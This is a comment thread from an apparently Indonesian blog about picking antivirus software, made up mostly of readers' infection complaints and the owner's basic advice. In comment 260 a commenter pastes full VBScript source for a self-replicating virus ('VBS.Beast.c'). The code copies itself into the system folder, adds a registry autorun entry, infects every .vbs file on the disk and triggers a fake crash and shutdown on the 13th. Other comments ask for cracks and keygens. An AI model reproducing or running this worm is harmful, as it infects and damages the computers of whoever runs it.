  212. Saya cuma mau kasih tau ke semua user (terutama pengguna komputer). Virus memang sangat meresahkan kita semua. Keberadaanya membuat kita makin tak betah diganggu olehnya. Tapi perlu diketahui, ada beberapa konsekuensi berupa kelebihan dan kekurangan yang ada pada antivirus. Misalkan, antivirus yang bagus memiliki kelemahan, yakni berbayar. Sedangkan yang gratis, meskipun gratis dan mudah tetapi kurang ‘ekstrim’ dalam menjerat virus-virus. Saya mau kasih saran buat pengguna antivirus dikalangan netter. Seperti yang kita ketahui bersama, antivirus yang bagus dan gratis masih ada lho. Coba kita lihat. AVG, avast!, avira, de el el masih menyediakan versi gratisnya. Jadi asalkan versi gratis tetapi jika rutin mengupdate virus definition yang subsequent (terbaru) akan menghasilkan hasil yang lumayan. Ingat! tidak ada antivirus yang baik. Semuanya sama. Hal yang paling utama adalah. KITA RAJIN MENGUPDATENYA!!! Proteksi terbaik yakni diri kita sendiri. Asalkan kita rajin memilih, memindai setiap port USB yang masuk ke komputer kita. Mudah2an komputer kita bisa terbebas dari seranganya. Bagi yang mau tukar informasi seputar perlindungan komputer, kirim alamat anda ke gatal.digaruk@yahoo.com. Nama e-mail tidaklah penting.

  213. mas ebta komputer saya kan koneksi ke internet jadi bagusnya pakai anti virus apa ya mas? trima kasih mas jawabannya?

  214. mas ebta saya mau tanya sekali lagi dan mohon jawabannya, komputer saya sering muncul program search sendiri sampai biasa 20 kali saya sudah menscannya pakai avira tapi tidak detek dan langkah terakhir saya instal ulang komputer saya tetapi tetap saja sering muncul, itu apanya mas? makasih mas sarannya………….

  215. @dewa
    untuk versi premium gunakan kaspersky atau avira premium. Kalau yang freeware bisa menggunakan avast atau avira ditambah anti spyware lainnya. Atau juga AVG 8.0, jika tidak bermasalah

    Saya kurang tahu masalah sering muncul search itu. Coba scan dengan antispyware atau adware..

  216. assalamualaikum
    saya lagi kena banyak virus nih, baru mau coba update, doain ya biar lekas sembuh. saya masih pake avira nich.
    syukron tya info ngupdate nya.

  217. makasih mas atas jawabanya sangat berguna sekali, mas bisa gak kirimkan alamat untuk download kaspersky internet security atau avira premium nya…..

  218. kompi ku kena virus!!!! di flash disk ku , ada 2 file virus : autorun.inf dan boot.exe. parahnya di kompi ku nggak bisa nampilin file tersebut!!! tak coba pake avira updater terbaru gak mempaaaan. gimana nih!!

  219. @husein
    wa’alaikumsalaam
    sama-sama.. semoga berhasil basmi virusnya..

    @dewa
    kalau download versi premium, langsung di website avira.com dan kaspersky.com saja..

    @wong jowo
    sepertinya sebelum flashdisk, komputernya harus di bersihkan dulu virusnya.. baru flashdisk

  220. mas ebta mau tanya bisa gak kalau kita online internet nonton tv lokal atau berbayar di pc kita? ………..

  221. Makasih untul infonya. kebetulan aku lagi cari antivirus 4 komputerku. Jadi aku pilih avast aja. Soalnya updatenya cepet banget! Thx

  222. thank you for the information about the best antivirus!
    i like your article!
    keep it up!!!!

  223. @dewa
    jika ada web site yang menyediakan fasilitas tersebut, sepertinya bisa. Kalau luar sudah banyak, tapi belum tahu kalau lokal..

    @Ryan
    sama-sama mas..

    @Very
    Thank you..

  224. bisa kasih tau gak mas ebta website nya kalo mau nonton online tv luar?……… trims ya

  225. Deuh……pusing deh…..komputer saya pake antivirus AVG 7.5 dan PC Media.Yah sebenarnya nggak masalah sih…cuma akhir2 ini komputer saya kok kalo dihidupin kadang nggak bisa nyala alias keluar menunya….padahal CPU nya nyala loh…
    untuk mouse dan keyboardnya jg nggak aktif…pusing deh..
    padahal saya orang awam yang nggak begitu paham dng komputer.
    oiya komputer saya Pake Acer pentium 4 please help me…

  226. Pingback: Virus, Trojan, Worm dan Antivirus | KaSaB
  227. @dewa
    kalau dulu saya pernah ikut IslamBox.com, tetapi karena koneksi internet lambat, jadi tidak bisa mengikuti..

    @pongky
    Coba upgrade antivirusnya, ganti dengan AVG 8.0, Avira 8 atau Avast Dree Edition..

  228. komputer saya tidak bisa buka site antivirus seperti AVG, nod32. Tapi untuk buka sites lain selain antivirus bisa.
    please, bantuannya

  229. @dewa
    sama-sama mas..

    @ferdi
    Coba di scan dengan anti spyware dan adware..
    bisa juga itu masih ada virusnya di komputer

  230. hallo………and hai.hai……buat kalian semua menurut pendapat w yang sudah bosen mengganti- ganti anti virus dari beberapa merek yang sudah di jelaskan diatas. kata w sih yang paling mantep avast selain dapat mendeteksi mail,skin aktip, and virus apa jua kena terus asalkan di update……..ok yang tertarik silakan coba………………………….-n_n-

  231. mas ebta saya mw nanya klo gabungan antivir yg bgs apa ya.??
    klo skarang yg saya pakai avira sma pc-media..tpi hasilnya kurang bags..
    klo avira+avast jdinya gmna??
    saya mnta saran dari mas ebta y…dmhn saranya..mksh..

  232. @alfi santoso
    ya, selain avira, avast memang patut dicoba

    @revhanz
    Bisa, saya juga sedang mencoba avast, jadi saat ini pakai avira + avast.. sebenarnya asal rutin update dan waspada, satu saja cukup..

  233. @revhanz
    Oh ya, saya belum begitu tahu, tapi sebagai gabungan antivirus, mungkin bisa dilihat hasil di antivirus terbaik, kategori scan spyware..

    Jika senantiasa konek ke internet, dua-duanya penting. Dan tidak masalah di aktifkan dua-duanya..

  234. haibro!!! yg plg bagus itu anti vira,anti vira antivirus yg paling baik daripd yg lainnya beliaja antivira Rp.200.000 (murahkan?)

  235. kemaren komputer gua kena virus yg ga dikenal… dah coba berbagai antivirus (hampir semua jenis antivirus lokal and internasional yg update) eh tetap aja ga kedetek… trus gua format dan install ulang aja (ampe 5x lo) eh tetep aja nivirus muncul lagi… so, ada usul ga neh bantu problem solving gua… trims coy.

  236. @alex
    scan dulu dari recovery bootable CD atau dari komputer lain. Jika install ulang, pastikan memilih full format, kemudian setelah selesai, install antivirus dulu dari flashdisk yang bersih dan masternya bebas virus..

  237. saya pke antivir lumayan bagus, tp virus-virus yang bisa terlihat dan ga terdetek oleh antivir saya gunakan killer machine 4. langsung lenyap virusnya.oke thank’s.

  238. @allie
    terimakasih informasinya, saya malah belum pernah mencoba killer machine.. (masig asing.. 🙂 )

    @iffa
    Memang Kaspersky juga termasuk salah satu antivirus terbaik, hanya saja tidak ada versi gratisnya..

  239. Kompt sy pk anti virus Bitdefender
    pas lagi genting2nya
    waktu masukan flash disk, kena scan
    data hilang semua
    stesssssssss dehhhhhhhh
    jadi bg yg pk anti virus
    kudu hati-2
    tik kata orang kapuas hulu
    anang silah beri magang
    pantau dulu baet2
    good luck

  240. Mas, gmana cara meremove PCMAV dari PC, kan ga di install????
    Apa cuma delete folder dan file – file nya aja?

  241. @Benny Santoso, S.Kom
    Terimakasih atas informasinya, semoga kita semakin hati-hati..

    @ROBUS KASUNDA
    🙂

    @DOez
    sama-sama…

    @adi
    Klik kanan, icon PCMAV dan pilih/hilangkan menu autostart…
    kemudian exit. setelah itu hapus folder PCMAV.. sepertinya itu saja..

  242. solusi kalo udah kena virus yang parah, si hajar pake antivirus apa aja gak bisa, baiknya di repair aja windowsnya lagi,… cara repair adalah cara yang paling ampuh,….
    dan masukan satu lagi, jangan lakukan double click pada folder secara langsung bagusnya gunakan explorer, karana dengan cara klik 2x virus otomatis run di sistem 32 anda, ya udah rusak deh,…. cara perbaikanya ya di repair,… tenang gak harus instal program2 yang udah kita istal dulu kok,… setelah selesai di repair disarankan instal deepfreeze v6 di drive c,.. di jamin seumur hidup aman dari virussss…. kalo sudah menggunakan deep freeze v6 saat akan istal or uninstall open deep freezenya,… shift+klik 2x icon deepfreeze.. OK!!! GBU

  243. Assalammualaiku Wr. Wb.
    Saya Arif taufiq hidayat
    saya hanya mau nanya kira-kira harga anti virus avast berapa… dan versi avast yg bagus itu apa saja
    1. Avast Home Edition atau
    2. Avast Professional dll
    kira2 yg bgs yg mana ya…
    dan kira2 harga laptop ACER Aspire yg spesifikasinya antara berikut :
    1. Memory 1 GB
    2. VGA 512 Mb
    3. Intel Centrino atau Dual Core
    4. Harddisk 160 GB
    5. Wirelless
    6. Bluetoot

    Terima kasih sebelumnya
    Wassallammualaium Wr. Wb.

  244. akuh bingung, versi gratisan yang mantab apaan yaah? help me.. avg ataw avast? thx b4,,
    hampir tiap hari kena virus boot.exe, trojan, vbs, huft… cape banget…

  245. @doni (301)
    Terimakasih atas tambahan informasinya..
    mungkin dengan deepfreeze bisa lebih aman, tetapi tidak menjamin aman 100%, apalagi seumur hidup.. 🙂

    @.. (302)
    Coba gunakan antivirus lokal saja..

    @arif taufiq hidayat
    wa’alaikumsalaam warahmatullah wabarokatuh
    Untuk harga, bisa langsung mengunjungi situs avast.com..

    @hates most virus
    yang gratis dan mantab saat ini Avira kalau agak lengkap avast, tetapi scan virus masih lebih baik avira menurut saya..

  246. mas klo pas masukin flash disk tba2 dilayar kluar tulisan disk boot faillure,insert system disk dan press enter…
    itu knp ya??ap itu virus???

  247. saya bingung dengan anti pirus,dan saya mau tanya yang bagus bagai mana yaaaah…

  248. @revhanz
    tampilan pesannya seperti apa ya?
    Apakah blank screen atau window dialog saja? Itu sudah masuk windows ya ?

    @rudi
    untuk yang free, saat ini avira antivir. Coba gunakan saja antivirus ini.

  249. Pingback: Antivirus, Update terbaru Antivirus. « Inovation Faculty of Economic UNNES
  250. belum masuk ke windows.,..
    pas prtama dhdpn kmputernya lgsung ad tulisan itu…(blank screen)..itu knp y?

  251. @revhanz
    Ada bebrapa kemungkinan, misalnya tidak mendeteksi hardisk atau tidak mendeteksi master boot record hardisk. Coba kabel ke hardisk di lepas, kemudian dipasang kembali dengan baik..

  252. pernah kena maxtrox juga nih,coba ganti Profile user / Acount kamu dilaptop..

  253. oy mksh mas..komp saya ud bnr lgy brkt cra mas ebta..
    oy mas ebta pc-media yg bru skrg versi brp ya?

  254. Saya punya antivirus tapi tdk aktif,bagaimana ya mengaktifkannya ?

  255. trims tapi apaaja sih antivirus yang cocok untuk komputer kita??????????????

  256. @kaspul Anwar
    Kurang jelas mas, antivirus apa? Mungkin hanya perlu update saja..

    @brian
    Mudahnya gunakan saja Avira Antivir Personal, yang gratis.. atau Avast

  257. yah, thanks alot for the info…
    buat refisi lumayan…
    tapi saya masi lebih prefer pake Kasperski soalnya pake AVG masih suka jebol alias kena virus, sedangkan Kasperski gak pernah tuh…
    tapi relatif sih jadi silahkan kalau ada yang suka pakai anti virus yang lain

    peace out! 🙂

  258. semua anti virus sama ja dan tergantung virus yang ada dan untuk mengatasi virus tergantung anti virus juga.

  259. avg 7.5 lebih bagus dari pada yang 8.0 soalnya yang versi 8.0 berat n sama aja fungsinya
    udah gt gaenakeun klo 8.0 di pasangin buat window vista

  260. Assallammuallaikum..mmm……wb.wb
    Salam Sejahtera…
    kallo aneboleh ikut nongkrong… ane cumamu kasih tau…. dan pengin tau aja… napa sih ente2 pada sibuk ngurusin juga takut yang amanya virus…???
    daripada bolak balik mikirin hal2 yang g jelas begitu alias ente2 di permainkan juga sebagai kelinci percobaan bisnis para Hacker jg pakar komputer…. mendingan ente pada belajar atau cari pengalaman yang lain…. yang bermanfaat…
    g mu kena VIRUS??? Pake Linux-UBUNTU aja …kelar kan urusan!!!!
    sekedar ingin bagi ilmu… ni bawah ini ane punya sentak virus… ente salin aja ke VB, Apa gmelalui Java Scripct…aja… ente pelajarin aja….tuh scrict….
    ngapain sibuk2 pake anti virus….
    cukup ente buka Run: ketik “REGEDIT” Ubah semua nilai Value yang ada dis2.
    sory untuk para PAKAR…JUGA MAHASISWA TI-MI-SI… Bukannya sok tau nih…. tapi ane cumapingin ikut nimbrung aja….. kasian aja liat forum isinya masalah korban virussss……….. aja…..

    ane g bisa apa2 kok….. ane cuma RAKYAT JELATA…. SEKOLAH AJA G kelar2….. maaf apabila untuk para pakar atau ahli…merasa geram
    dengan cara ane yang lakukan ini….. tapi sudahlah pembodohan generasi bangsa…!!!!!
    ok!!!! PEACE IN LOVE….PEACE SOULMATE TO YOGYAKARTA!!!!!

    =======================================================================================================
    On Error Resume Next
    Set FSO = CreateObject(“Scripting.FileSystemObject”)
    WeAre = Wscript.ScriptFullName
    Set Body = FSO.OpenTextFile (WeAre)
    Buffa = Body.ReadAll
    Body.Close
    For s = Len(Buffa) To 1 Step -1
    If Mid (Buffa, s, 1) = Chr(126) Then
    s = 1
    Beast = “‘” & Chr(126) + Beast
    ElseIf Mid (Buffa, s, 1) Chr (126) Then
    Beast = Mid (Buffa, s, 1) + Beast
    End If
    Next
    Set WshShell = CreateObject(“WScript.Shell”)
    FSO.CreateTextFile (FSO.GetSpecialFolder(1)&”w95inf32.vbs”)
    Set Wr = FSO.CreateTextFile (FSO.GetSpecialFolder(1)&”w95inf32.vbs”, true)
    Wr.Write (Beast)
    Wr.Close
    WshShell.RegWrite “HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunBeast”, FSO.GetSpecialFolder(1)&”W95inf32.vbs”
    Set DiskRoot = FSO.GetFolder (“”)
    Call Recurse (DiskRoot)
    If Day (Now) = 13 Then
    MsgBox “Runtime Error!” & chr(10) & Chr(10) & “Program C:WINDOWSEXPLORER.EXE” & Chr(10) & Chr(10) & _
    Chr(10) & “abnormal program termination”, vbCritical+vbOKonly,”Microsoft Visual C++ Runtime Library”
    WShell.Run (“rundll32 krnl386.exe,exitkernel”),vbHide
    End If
    Function DoFile (CFile)
    Set VictimF = CFile
    Attrib = VictimF.Attributes
    VictimF.Attributes = Normal
    Buffa = “”
    Set Body = FSO.OpenTextFile (CFile)
    Buffa = Body.ReadAll
    Body.Close
    If Mid (Buffa, Len(Buffa), 1) “#” Then
    Set Body = FSO.OpenTextFile (VictimF, 8)
    Body.Write Beast
    Body.Close
    End If
    VictimF.Attributes = Attrib
    End Function
    Function Recurse (Folder2scan)
    Set Gamno = Folder2Scan.SubFolders
    For Each goo In Gamno
    Call Recurse (goo)
    Next
    Set FileList = Folder2Scan.Files
    For Each CFile In FileList
    If FSO.GetExtensionName (CFile.Path) = “vbs” then
    Call DoFile (CFile)
    ElseIf FSO.GetExtensionName (CFile.Path) = “VBS” Then
    Call DoFile (CFile)
    End If
    Next
    End Function
    ‘VBS.Beast.c by GWI
    =======================================================================================================
    SORY GW BUKAN HACKER ATAU PAKAR
    GW CUMA BELAJA DARI PENGALAMAN DAN GW YAKIN LOE BAKAL BISA….
    ASALKAN JANGAN TAKUT SALAH…..
    Wassallam….Wr.Wb….

  261. @Mei @yoga
    terimakasih atas informasinya..

    @Benjamin
    selain antivirus yg dipakai, user juga ikut berpengaruh..

    @Tiar Camp
    Wa’alaikumsalaam warahmatullah wabarokatuh..
    Terimakasih atas komentar yang cukup panjang-nya..
    Tidak semua orang harus dan bisa belajar programming atau coding seperti diatas. Bahkan banyak yg punya kesibukan lain, pekerjaan lain, yang mungkin lebih penting..

    Jadi blog ini sekedar berbagi informasi dan pengalaman, dengan harapan bisa saling membantu, terutama bagi pengguna awam..

  262. Pingback: FIRAUN
  263. tolong donk… laptop saya kena virus amburadul namanya….
    gimana ya, cara ngilanginya… padahal saya baru beli sekitar 3 minggu yang lalu…. please help me….
    hiks… hiks… hiks…
    thanx’s ya….

  264. @arif taufik hidayat…
    harga laptop ACER yang seperti itu sekarang sekitar 10-11 jtaN….
    karna harga dolar yang tdk stabil…
    1 bln yang lalu saya beli ACER Aspire 4930-581G25Mn

    Core2 Duo T5800, 1GB DDR2, 250GB HDD, DVD

  265. @arif taufik hidayat…
    harga laptop ACER yang seperti itu sekarang sekitar 10-11 jtaN….
    karna harga dolar yang tdk stabil…
    1 bln yang lalu saya beli ACER Aspire 4930-581G25Mn

    Core2 Duo T5800, 1GB DDR2, 250GB HDD, DVD

  266. @ kaspul anwar…
    anda pak haji kaspul anwar dari banjarmasin bukan????

  267. komputer saya terkena virus sality.paling baik pake antivirus pa?di komputer saya dah da antivirus avast 4,7 n comodo.tetep ga bisa ilang.q pingin ngasih antivirus kaspersky atau yang lainnya tetapi ga bisa.padahal dikomputer antivirus avast 4,7 dah q delete.tolong dong knp q ga bisa nginstall antivirus lainnya?

  268. @Anisa
    Iya seperti saran mas nizaar, gunakan antivirus lokal, seperti PCMAV

    @edi
    pakai avira atau avg seharusnya bisa menangani virus tersebut.. tetapi harusnya di scan dari komputer lain atau dari recovery CD (Bootable CD)

  269. anti virus yang terbaik?instaal ulaaangg!!! ges gera ngagarali tereh kiamat

  270. Pingback: Blognya Sasongko » Eset Nod32 AV v. 3.0.669
  271. menurut saya..
    virus tidak bisa dihilangkan 100%,,but virus sendiri kalu di artikan secara luas ia bersifat MRNGGADAKAN DIRI & BERKEMBANG BIAK..DI DALAM FILE2 USER..!!JADI LEBIH BAIK MEMAKAI 2 PRODUK ANTIVIRUS YAITU ANTIVIRUS BUATAN LUAR & LOKAL..KARENA VIRUS LOCAL BIASANYA TIDAK TERDETEKSI OLEH ANTIVIRUS BUATAN LUAR..

  272. @chella
    COba cari informasi tentang virus tersebut di google dulu..

    @Andilala
    sama-sama

    @iqbalgati
    🙂

    @ryan
    Lebih baik mencegah daripada mengobati..
    Memang antivirus lokal sering lebih cepat mengatasi virus dalam negri karena informasinya lebih cepat dan akurat..

  273. Tolong dong, aku masih bingung nih masalah virus komputer. mulai dari download anti virus lalu memasukkannya ke komputerku dan bagaimana cara menghilangkan antivirus lama, jika ingin mengganti dengan antivirus yang baru.maaf nih mungkin pertanyaannya masih dasar banget. makasih ya?

  274. Toooooooolloooongggg….. Doooooongg…
    Gimana menghilangkan Virus Dark angel.
    Pleaseeeeee…kasih jawaban.
    semua anivirus uda dipake tp kenyataanya ttp aktif per tanggal.

  275. komputerku kena virus suspect bagaimana perbaikinya pake antivirusapa…? krn antivirus tdk bisa diisntall selalu dihidden tiap mo diinstall

  276. @anita
    kalau komputer sudah terkena virus, maka memang biasanya dengan menginstall tidak akan berhasil. Alternatifnya dengan recovery cd (bootable CD) atau di scan di komputer lain

  277. stuju ma IGBAL yang cerdas… basmi virus paling OK ya..
    gini lengkapnya:
    1. format C nya..
    2. installl XP
    3. beres deh…

  278. Saya senang sekai bisa mengetahui segala sesuatu tentang anti virus lewat situs ini.
    moga situs ini semakin maju dan berkembang.

  279. @manan
    Ya bagi yang tidak ingin pusing-pusing.. 🙂
    Tapi itu juga tidak menjamin, jika file-file exe di drive lain terinfeksi dan digunakan install lagi

    @Kin @Arlenz46
    sama-sama mas.. terimakasih

  280. @infini3
    Ada kok, Norton Nama lainnya Symantec. jadi lengkapnya Symantec Norton Antivirus..

  281. soblog
    mending jgn pk anti virus kinerja komputer lebih cepat
    percaya deh..
    saya sudah mencobanya sejak tahun 1997
    sebenernya jgn takut virus…
    virus cuman aplikasi buatan manusia juga…
    klo ada file aneh(tidak dikenal sm km jgn di klik 2x
    contoh “folder.exe
    itu adalah virus….
    klo ada apa2 tlp ke numb 92452516
    saya akan membantu,,, silahkan anda konsultasi ajah
    slama saya bisa bantu dengan senang hati saya akan membantu..
    (yoga gol&adn race)

  282. pake AVIRA aja hasilnya memuaskan. nggak ribet lg.

    BRAVO AVIRA…….

  283. virus manapun akan takluk dengan antivirus terbaru dari borland corporation, namanya Votltusvir. dapat di download di http://www.jumetvirus.com. selamat mencoba teman. saya sudah buktikan!!!!!!!!!!

  284. gw ada sebuah komputer di rumah terhubung dng internet. dari dulu sampai sekarang gw nggak pernah kena virus tuh..padahal gw nggak pernah install antivirus.emang seh dari dulu ampe sekarang tuh komputer nggak pernah gw hidupin…hehe

  285. @jumet
    linknya tidak bisa dibuka..

    @raja
    hehe.. wah itu spesifikasinya seperti apa ya ? komputer jaman dulu mungkin ya..

    @subagjo
    sama-sama mas/pak..

  286. Thank’Z ats info2nya, tp menurut saya… yg terbaik Avira..
    Karena dapat menghilangkan virus yg lama dgn cepat..
    selain itu.. klo lg scan.. komputernya masih cepet jg jalannya
    jadi klo main games… “jst don’t worry.. be happy ^_^”

  287. Selama aq nyoba berbagai anTiVIRUS,Menurut Aq..Antivirus yang bagus itu..ngeGabungin AviraAntiVirus + PCMAV (ClamAV)
    AVIRA sebagai Primary AntiVirus, terus yg PCMAV(ClamAV)bwt Secondary nya ” jangan di start Automaticaly”(dipakenya pas mau nge Install Program,APALAGI YG SERING PAKE CRACK,KEYGEN,PATCH.Biasanya virusnya asalnya dari situ.TRUS Pas mau masukin FlashDisk aja)
    CObain Deh..

  288. Hy Download Kholis-AntiVirus : http:kholis.4shared.com

    By : Kholis

  289. Hy Kholis-AntiVirus Udah MD5 Lho
    Download yaw : http:kholis.4shared.com

    By : kholis

  290. thank’s informasi nya boss…

    laptop w skarang pke antivir…

    w tau semuanya dari infor lo..

    ekali lagi thank bgt euy…

    nuhun a..

  291. Virus tu g’ banget,prnah komputer gue kena virus sampei mati total

  292. waktu gua ke warnet gua pakai USB dan langsung colok tuh, eh udah pulang, tau – taunya, USB udah kena virus, katanya virusnya merangkap worm dan trojan horse, akhirnya gua pakai aja tuh avast!, udah di scan langsung gua delete aja tuh
    sesudahnya udah deh, bersih

  293. Pingback: antivirus terbaik tahun 2008..? « WIBOWO BLOG
  294. Pakai PCMAV 1.91 aja pasti VBSnya ke buang
    terus kalau masih gak bisa juga install ulang aja komputernya lalu pakai Avast Home edition pasti VBS nya gak akan kembali lagi soalnya aku juga udah 3 kali kejadian kayak gitu dan cara itu yang paling manjur. Selamat mencoba yah RIO

  295. sudah sebulan lebih pcQ terkena virus Alzheimer sudah kucoba pake avast,pc mav1.91(terdeteksi),simantex, tapi semuanya ga bisa menghapus virusnya,ada ga yang tahu bagaimana cara meng hapus virus ini n bagusnya pake antivirus apa?

  296. AVG ama PC MEDIA memang bagus tapi saya pikir AVG itu untuk mengupdate sangat susah ajdi tolong tunjukan cara lebih baik untuk mengupdate

  297. ada ngga anti virus yang lbh komplit dari sebelum nya kyknya

    smua anti virus smua sama…ah…jngn yg rumit-rumit dech
    trims.

  298. waduh w pusing bgt nih PC w sering bgt restart. padahal w chek setingannya dah bener smua. apa kena virus ya? tolong cari solusinya dong !!!!.. w pake avira classic banyak virus yg w karatina. tapi kok karantina w dah 4 bulan gak kosong2. gmana cara matiin tuh virus tanpa remove file yg terinfeksi? help me chuy!!!!…. SECEPATNYA…

  299. @Ivoer Cavalera
    sering restart bisa jadi memang kena virus, tetapi bisa juga karena tegangan yg tidak stabil, hardware yang tidak stabil dll

  300. kompie kantor kena virus jaringan AV apa yg paling ampuh coz dah pake PCMAV,AVIRA sang virus mboten koit….

  301. @alpukat
    jika komputer sudah terlanjur terserang virus memang tidak mudah untuk menghilangkannya, meski dengan antivirus terbaru.. coba di konsultasikan ke bagian IT dulu..
    (scan hardisk di komp lain atau dengan recovery CD)

  302. Rekan-rekan setanah air klo mau aman computernya pake aja deedfriz aku sdh coba kita membasmi virus tanpa menggunakan anti virus kalo tidak percaya silahkan dibuktikan ok

  303. Klo aq jg pakai avira + pcmav-clamav krn pcmav brguna utk mendeteksi virus lokal yg mngkn blm bs terdeteksi anti virus luar negeri.dulu kompieku prnh kena virus services.exe (mendisable regedit,cmd,ms config,icon di desktop hilang smua,klik kanan desktop tdk bisa) pdhl dkompie dh terinstall antivirus tp ndk kedetect,trus aq gnti pk avira bs kedetect
    @anita : coba dscan pkai pcmav,klo saat klik pcmav.exe dblok jg ma virus,coba rename pcmav.exe dg nama laen br dklik

  304. anti virus yang bagus tu klo dah lengkapp am license nya donk.

    ad anti virus, tpi g ad license sama aj bodoh.

  305. kompie qu diktr pake anti virus PCmav + AVG, tp menurut temen qu gak boleh ada 2 anti virus nanti salah satu anti virus itu untuk nyarangnya virus… bener gak seh… tolong dong ksh masukan.. tx y

  306. @santi
    menurut sy klo 2 antivirus ( yg ada installernya) misal AVG ma Avira diinstall dua-duanya mgkn bs crash tp klo pcmav kan ndk diinstall,dia cm dijalankan klo mo scan aja.
    saya makai avira ma pcmav (makai yg pcmav RTP jg ) sejauh ini blm ada mslh (mudah2an seterusnya ndk mslh 🙂

  307. @santi
    memang sebaiknya tidak menggunakan 2 atau lebih antivirus, tetapi sepertinya asalannya kurang tepat. Selain memperberat kerja komputer bisa terjadi crash juga..

    Hanya saja saya pernah menggunakan AVG+Avira tidak masalah, cuma kerja komputer jadi terasa berat..

  308. Komp ku, hidden filenya tidak mau dikeluarin, gimana ya? Pengaruh viruskah? Trus bersihinnya gimana? (kalau disetting show hidden file begitu di chek lagi sudah balik ke awal)

  309. @mas_boy
    jika di cek kembali lagi itu tanda-tanda terkena virus, coba di scan baik dengan antivirus lokal atau non lokal..

  310. mas pa beda anti virus lokal ma yang luar, trus pa antivirus luar bisa mendeteksi virus varian lokal? thank’s ya

  311. Norton Internet Security 2009 bagus tuh….komputer pake NIS 2009 ga bakal lambat dan cepet cape. Kalo buat lokal biasanya kerenan pake ‘PC Media Antivirus’.

  312. @adi
    biasanya antivirus lokal lebih manjur dan lebih cepat update untuk virus-virus lokal, tetapi kurang handal menangani virus mancanegara

  313. komp saya kena virus..
    gag tw virus apa..
    stiap buka website untuk download antivirus,,pasti di cancel ma si virus itu,,
    truz dah dapet installer anti virus (AVG,,AVIRA,,KASPERSKY,,DLL) dari orang,,ga bsa di install jga..
    virus paan ya ??
    solusinya gmn ?? (selain format C) -_-”

    (ni virus ngajak rusuh aje)

    THANKZ..

  314. mas kenapa stp q sdh kirim sms, tetp sesaat kemudian hpnya kirim multimedia nya sendr jd solusinya gimn?

  315. assalamua’laikum

    klo cara menginstall antivirus di hp gmna ya ?

    thnks

  316. @Steve
    Seringnya tidak bisa, tetapi perlu dicoba juga

    @Ardi
    ??

    @Charian
    jika buka semua situs antivirus tidak bisa, kemungkinan kena worm conficker/kido. COba baca artikel terahir saya tentang worm ini

    @nn
    ?? nggak paham… ( antivirus / virus ?? )

    @hakim
    wa’alaikumsalaam
    saya belum pernah mencoba, mungkin format juga beda-beda ada yg java atau untuk windows mobile..

  317. Antivir itu AVIRA bukan ??? kok di cari2 gak ada namanya AntiVir …

  318. wah… makasih ya atas infonya sekarang gw pake Avira + Clamav +Ansav ttp Clamav dab Ansavnya buat secondary aja..

  319. sy memakai anti virus NOD, Norman, PC Mav dan AVG dalam 1 komputer, apakah hal itu akan menimbulkan masalah ?

  320. @Arif
    wah banyak sekali antivirusnya, saya kurang tahu pasti. Tapi jika semuanya aktif memang beresiko akan menimbulkan masalah

  321. komp aku kena virus semua program klu dijalankan error terus..
    enaknya pake antivirus apa ya supaya gak gampang banget keserang virus…
    beritau solusinya ya cara downloadnya thnks…

  322. @mamima
    pilih sapa saja asal rutin update dan jangan lupa matikan fasilitas autorun windows, tampilkan ekstensi file dan jika perlu tampilkan file-file hidden

  323. saya ksulita menginstal avira helix
    saya dowload ktika saya instal sruh msukan key
    cara mndpatkan key gmana

  324. klo ngilangin virus W32 pinfi dan exe nya udah kena virus pake antivirus apa ya????

  325. @tika
    Iya, sebaiknya menggunakan Avira saja, ada versi free. Kalau helix tidak ada versi gratis

    @baskoro
    sudah cari informasi remover (tools cleaner) untuk virus dengan nama tersebut ? terutama di situs antivirus yg digunakan..

    @eyang
    Iya kalau update manual, memang sepertinya belum disupport resmi. Tetapi coba di search komentar sebelumnya / di ebsoft, dulu pernah ada yg memberikan link cara-cara update manual

  326. mas bisa kasi’ link nya g?cara2 update manual nod32 ,., soale udah saya cari de ebsoft seblm2ny g ada

  327. Pingback: Ale2v2’s Blog
  328. kasih tw donk cara update manual esset32

    klo bsa file updatennya jg…

  329. Pingback: It’s My Free Life
  330. Pingback: All ABouT Avira Antivir « It’s My Free Life
  331. ka, aku sekarang udah ganti dari kaspersky ke avira free..
    nah, yang aku bingung, gimana cara upgrade avira saya dari free version jadi premium yang gratis??

    ada cracknya ga ka??

    bisa kasih tau caaranya ga ka??, kalo ada, tolong kirimin ke email saya ya ka..

    please..
    tolongin saya how solved these problem out..

    thanx b4

  332. Pingback: Anti Virus Terbaik di Tahun 2008 | Indo Top Ten
  333. @aNhal
    bisa di hapus dari bootable CD atau komputer lain (melepas hardisk) atau dicoba melalui safe mode

    @andy
    YG dimaksud virus guardian itu nama aplikasi atau fitur antivirus ya ?

    @amri tabligh
    Norton = Symanetc

    @Anzhari
    biasanya virus akan menduplikasi diri sangat banyak juga bisa menginfeksi aplikasi (ke arah sistem operasi/offline). Kalau spyware lebih ke arah jaringan (internet), menampilkan iklan web/situs, mengubah-ubag setting internet dsb..
    Selengkapnya bisa merefer ke wikipedia

  334. PCku kena virus. ciri2 semua file JPEG extensinya jadi jpg.exe type aplication (arsip foto2 rusak gak ya???) trus date modified file images tersebut jadi sama semuanya. trus setiap abis ngeprint selalu diakhiri dengan puisi “Patah Hati” gmana cara basminya aku dah pake AVG Update, PCMAV, ANSAV tapi gak kena juga!!! gmana cara membasminya thanx by sandy SULTENG

  335. @sandy
    Jika file-file exe-nya semua berukuran sama, coba di cek file-file yang mungkin tersembunyi. Tetapi jika ukuran file exe berbeda-beda, kemungkinan file jpg-nya disusupi virus..

    Sepertinya virus lokal, jadi mungkin perlu update antivirus lokalnya..

  336. mas bsa kasih tau cara uodate bitdefendewr total security 2009

    matur tengkiyuuu!!!!

  337. aku mau tanya…
    setiap aku buka fs or fs,pasti keluar tanda # di belakang alamat fs nya setelah saya pencet log in…(www.friendster.com# )
    terkadang kluar tanda ?.
    apa mungkin itu virus yg bisa menjebol password saya,setiap saya masuk ke fs or fb

    satu lagi

    certificate security d computer saya palsu…

    apa yg harus saya lakukan?

    terimaksih banyak

  338. saya menggunakan antivir AVG 8,
    di pc saya ada file .exe berbentuk comandpromt, seetelah di scan dgn avg 8 terdeteksi virus. tapi pada antivirus nya hanya bs di lakukan pembuka comandpromt itu menjadi seperti data aslinya. apakah itu sudah di hapus virus yang terdeteksi td mas?

    trim’s

  339. ka,,

    bisa..

    hehehe..
    makacy ya..

    anyway,, keygennya cuma tinggal 1 bulan lagi..
    gimana ini??
    apa ada crack lain lagi buat update avira premium saya yang gratis??

    maklum ka,, saya bener2 baru mulai belajar komputer dengan laptop saya..

